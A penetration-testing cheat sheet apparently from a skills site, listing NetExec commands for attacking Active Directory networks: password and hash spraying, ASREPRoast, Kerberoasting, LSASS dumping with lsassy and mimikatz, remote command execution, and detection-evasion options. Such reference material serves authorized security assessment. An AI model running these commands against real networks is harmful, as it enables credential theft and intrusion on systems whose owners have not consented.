콘텐츠로 이동
1337skills 1337skills - 치트시트

NetExec

NetExec (formerly CrackMapExec) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks through network protocol abuse and credential attacks.

Installation & Setup

CommandDescription
pip3 install netexecInstall NetExec via pip
pipx install netexecInstall with pipx (recommended)
git clone https://github.com/Pennyw0rth/NetExec.gitClone from GitHub
cd NetExec && pip3 install .Install from source
netexec --versionCheck installed version
netexec --helpDisplay help information

Basic Usage

CommandDescription
netexec smb 192.168.1.0/24Scan SMB on subnet
netexec smb 192.168.1.100 -u username -p passwordAuthenticate with credentials
netexec smb 192.168.1.100 -u username -H ntlmhashAuthenticate with NTLM hash
netexec smb 192.168.1.100 -u '' -p ''Anonymous authentication
netexec smb targets.txt -u username -p passwordUse target file

Protocol Support

SMB Protocol

CommandDescription
netexec smb 192.168.1.100Basic SMB enumeration
netexec smb 192.168.1.100 --sharesEnumerate shares
netexec smb 192.168.1.100 --usersEnumerate users
netexec smb 192.168.1.100 --groupsEnumerate groups
netexec smb 192.168.1.100 --local-groupsEnumerate local groups
netexec smb 192.168.1.100 --sessionsEnumerate sessions
netexec smb 192.168.1.100 --disksEnumerate disks

WinRM Protocol

CommandDescription
netexec winrm 192.168.1.100 -u username -p passwordWinRM authentication
netexec winrm 192.168.1.100 -u username -p password -x "whoami"Execute command
netexec winrm 192.168.1.100 -u username -p password -X powershell.ps1Execute PowerShell script

LDAP Protocol

CommandDescription
netexec ldap 192.168.1.100 -u username -p passwordLDAP authentication
netexec ldap 192.168.1.100 -u username -p password --usersEnumerate LDAP users
netexec ldap 192.168.1.100 -u username -p password --groupsEnumerate LDAP groups
netexec ldap 192.168.1.100 -u username -p password --computersEnumerate computers

MSSQL Protocol

CommandDescription
netexec mssql 192.168.1.100 -u username -p passwordMSSQL authentication
netexec mssql 192.168.1.100 -u username -p password -q "SELECT @@version"Execute SQL query
netexec mssql 192.168.1.100 -u username -p password --local-authLocal authentication

SSH Protocol

CommandDescription
netexec ssh 192.168.1.100 -u username -p passwordSSH authentication
netexec ssh 192.168.1.100 -u username -k id_rsaSSH key authentication
netexec ssh 192.168.1.100 -u username -p password -x "id"Execute command

Authentication Methods

Password Authentication

CommandDescription
netexec smb 192.168.1.100 -u username -p passwordSingle credential
netexec smb 192.168.1.100 -u users.txt -p passwords.txtCredential lists
netexec smb 192.168.1.100 -u username -p passwords.txtPassword spraying
netexec smb 192.168.1.100 -u users.txt -p passwordUser enumeration

Hash Authentication

CommandDescription
netexec smb 192.168.1.100 -u username -H ntlmhashNTLM hash
netexec smb 192.168.1.100 -u username -H lmhash:ntlmhashLM:NTLM hash
netexec smb 192.168.1.100 -u users.txt -H hashes.txtHash lists

Kerberos Authentication

CommandDescription
netexec smb 192.168.1.100 -u username -p password -kKerberos authentication
netexec smb 192.168.1.100 -u username --use-kcacheUse Kerberos cache
netexec smb 192.168.1.100 -u username -p password --kerberosForce Kerberos

Enumeration

Share Enumeration

CommandDescription
netexec smb 192.168.1.100 --sharesList shares
netexec smb 192.168.1.100 --shares -u username -p passwordAuthenticated share listing
netexec smb 192.168.1.100 --spider SHARESpider share contents
netexec smb 192.168.1.100 --spider SHARE --pattern "*.txt"Search for files

User Enumeration

CommandDescription
netexec smb 192.168.1.100 --usersEnumerate users
netexec smb 192.168.1.100 --rid-bruteRID bruteforce
netexec smb 192.168.1.100 --users --rid-brute 1000-2000RID range

Group Enumeration

CommandDescription
netexec smb 192.168.1.100 --groupsEnumerate groups
netexec smb 192.168.1.100 --local-groupsLocal groups
netexec smb 192.168.1.100 --groups "Domain Admins"Specific group

Computer Enumeration

CommandDescription
netexec ldap 192.168.1.100 --computersEnumerate computers
netexec smb 192.168.1.100 --computersSMB computer enumeration

Command Execution

SMB Command Execution

CommandDescription
netexec smb 192.168.1.100 -u username -p password -x "whoami"Execute command
netexec smb 192.168.1.100 -u username -p password -X script.ps1Execute PowerShell script
netexec smb 192.168.1.100 -u username -p password --exec-method wmiexecUse WMI execution
netexec smb 192.168.1.100 -u username -p password --exec-method smbexecUse SMB execution

WinRM Command Execution

CommandDescription
netexec winrm 192.168.1.100 -u username -p password -x "Get-Process"PowerShell command
netexec winrm 192.168.1.100 -u username -p password -X script.ps1Execute script

Modules

Built-in Modules

CommandDescription
netexec smb 192.168.1.100 -M spider_plusEnhanced spidering
netexec smb 192.168.1.100 -M enum_avproductsEnumerate AV products
netexec smb 192.168.1.100 -M gpp_passwordGroup Policy Preferences
netexec smb 192.168.1.100 -M lsassyLSASS dumping
netexec smb 192.168.1.100 -M mimikatzMimikatz execution

Module Options

CommandDescription
netexec smb 192.168.1.100 -M spider_plus -o READ_ONLY=falseModule options
netexec smb 192.168.1.100 -M lsassy -o BLOODHOUND=trueBloodhound output

Database Operations

CommandDescription
netexec smb 192.168.1.100 --users --export users.csvExport to CSV
netexec dbDatabase management
netexec db --workspace defaultSet workspace
netexec db --clear-databaseClear database

Advanced Features

Credential Stuffing

CommandDescription
netexec smb targets.txt -u users.txt -p passwords.txt --continue-on-successContinue on success
netexec smb targets.txt -u users.txt -p passwords.txt --fail-limit 3Fail limit

Password Policy

CommandDescription
netexec smb 192.168.1.100 --pass-polGet password policy
netexec ldap 192.168.1.100 --pass-polLDAP password policy

Bloodhound Integration

CommandDescription
netexec ldap 192.168.1.100 -u username -p password --bloodhoundCollect Bloodhound data
netexec ldap 192.168.1.100 -u username -p password --bloodhound -c AllAll collections

ASREPRoast

CommandDescription
netexec ldap 192.168.1.100 -u users.txt --asreproast asrep.txtASREPRoast attack
netexec ldap 192.168.1.100 -u username -p password --asreproast asrep.txtAuthenticated ASREPRoast

Kerberoasting

CommandDescription
netexec ldap 192.168.1.100 -u username -p password --kerberoasting kerb.txtKerberoasting attack

Output and Logging

CommandDescription
netexec smb 192.168.1.100 --verboseVerbose output
netexec smb 192.168.1.100 --debugDebug output
netexec smb 192.168.1.100 -o output.txtSave output to file
netexec smb 192.168.1.100 --log logs/Log directory

Configuration

Config File (~/.nxc/nxc.conf)

[nxc]
workspace = default
last_used_db = ~/.nxc/workspaces/default/nxc.db
pwn3d_label = Pwn3d!
audit_mode = False
reveal_chars_of_pwd = 0

Protocol-specific Options

CommandDescription
netexec smb 192.168.1.100 --port 445Custom port
netexec smb 192.168.1.100 --timeout 5Connection timeout
netexec smb 192.168.1.100 --threads 100Thread count

Evasion Techniques

CommandDescription
netexec smb 192.168.1.100 --jitter 1-5Random delay
netexec smb 192.168.1.100 --delay 2Fixed delay
netexec smb 192.168.1.100 --obfsObfuscation

Common Attack Scenarios

Domain Enumeration

# Basic domain enumeration
netexec smb dc.domain.com -u username -p password --users --groups --computers

# Share enumeration
netexec smb 192.168.1.0/24 -u username -p password --shares

# Password policy
netexec smb dc.domain.com -u username -p password --pass-pol

Credential Attacks

# Password spraying
netexec smb 192.168.1.0/24 -u users.txt -p 'Password123!' --continue-on-success

# Hash spraying
netexec smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76

# ASREPRoast
netexec ldap dc.domain.com -u users.txt --asreproast asrep_hashes.txt

Post-Exploitation

# Command execution
netexec smb 192.168.1.100 -u username -p password -x "net user /domain"

# LSASS dumping
netexec smb 192.168.1.100 -u username -p password -M lsassy

# Bloodhound collection
netexec ldap dc.domain.com -u username -p password --bloodhound -c All

Integration with Other Tools

Impacket Integration

CommandDescription
netexec smb 192.168.1.100 -u username -p password --exec-method wmiexecUse Impacket WMI
netexec smb 192.168.1.100 -u username -p password --exec-method smbexecUse Impacket SMB

Crackmapexec Migration

CommandDescription
netexec --convert-cme-dbConvert CME database
alias cme='netexec'Create alias for compatibility

Troubleshooting

CommandDescription
netexec --helpGeneral help
netexec smb --helpProtocol-specific help
netexec -vVersion information
netexec --debug smb 192.168.1.100Debug mode

Best Practices

  • Use authentication before enumeration when possible
  • Implement proper delays to avoid detection
  • Use workspaces to organize different engagements
  • Export results for further analysis
  • Combine with other tools for comprehensive assessment
  • Monitor for defensive responses
  • Use appropriate thread counts to avoid overwhelming targets
  • Implement proper logging for documentation
  • Validate credentials before large-scale attacks
  • Use obfuscation techniques when necessary

Security Considerations

  • Only use on authorized networks
  • Implement proper access controls
  • Monitor for detection by security tools
  • Use least privilege principles
  • Document all activities for compliance
  • Coordinate with blue team when applicable
  • Implement proper cleanup procedures
  • Store credentials securely
  • Use encrypted communication when possible
  • Regular updates to maintain effectiveness